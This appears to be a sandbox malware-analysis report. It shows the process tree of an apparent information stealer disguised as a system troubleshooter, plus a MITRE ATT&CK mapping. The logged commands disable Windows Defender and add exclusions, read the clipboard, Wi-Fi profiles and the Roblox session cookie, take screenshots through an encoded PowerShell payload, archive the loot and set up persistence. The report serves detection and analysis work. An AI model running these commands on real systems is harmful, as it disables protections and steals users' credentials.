        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        6⤵
        
        PID:3472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6080
- - C:\Windows\system32\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:4524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Scanning for errors...' -ForegroundColor Yellow"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1564
- - C:\Windows\system32\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:1288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host '20 critical errors found...' -ForegroundColor Red"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4376
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:3924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Attempting to fix errors. Do not close the terminal or turn off the PC to avoid complications...' -ForegroundColor Yellow"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1940
- - C:\Windows\system32\timeout.exe
    timeout /t 60
    3⤵
    - Delays execution with timeout.exe
    PID:5588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Troubleshoot process completed successfully....' -ForegroundColor Green"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4280
- - C:\Windows\system32\timeout.exe
    timeout /t 05
    3⤵
    - Delays execution with timeout.exe
    PID:5636
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1508
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5216
- - C:\Users\Admin\AppData\Local\Temp\hjukrl.exe
    "C:\Users\Admin\AppData\Local\Temp\hjukrl.exe"
    3⤵
    - Executes dropped EXE
    PID:5188
  - - C:\Users\Admin\AppData\Local\Temp\hjukrl.exe
      "C:\Users\Admin\AppData\Local\Temp\hjukrl.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3304
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hjukrl.exe'"
        5⤵
        
        PID:1864
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hjukrl.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:1596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        5⤵
        
        PID:4516
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        5⤵
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
        5⤵
        
        PID:1680
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
        6⤵
        
        PID:5864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  .scr'"
        5⤵
        
        PID:960
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎  .scr'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5612
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:964
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:6000
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5480
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:496
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:5424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:2728
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:1904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:3636
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:1148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2668
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:2292
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:332
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:1848
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:5428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:3400
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:5000
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5mbkvr1\b5mbkvr1.cmdline"
        7⤵
        
        PID:5640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6FB3.tmp" "c:\Users\Admin\AppData\Local\Temp\b5mbkvr1\CSCCF5D27886D9E4804BCEFB92FE313B97B.TMP"
        8⤵
        
        PID:5328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2380
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:4852
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:5788
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2296
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:1580
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:3920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2220
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:1688
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:1892
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:5880
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:6076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:5336
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2292
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:1180
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\Q8BF0.zip" *"
        5⤵
        
        PID:5340
      - C:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI51882\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\Q8BF0.zip" *
        6⤵
        Executes dropped EXE
        
        PID:228
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:3564
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:2700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:4604
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:5720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:5600
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1904
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:4904
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:5636
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:1972
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:1924
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:2352
- - C:\Users\Admin\AppData\Local\Temp\etuaxj.exe
    "C:\Users\Admin\AppData\Local\Temp\etuaxj.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx
    PID:4944
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "notepad" /tr "C:\Users\Admin\AppData\Roaming\notepad.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2252

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:984

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2544

C:\Users\Admin\AppData\Roaming\notepad.exe
C:\Users\Admin\AppData\Roaming\notepad.exe
1⤵
- Executes dropped EXE
PID:6072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

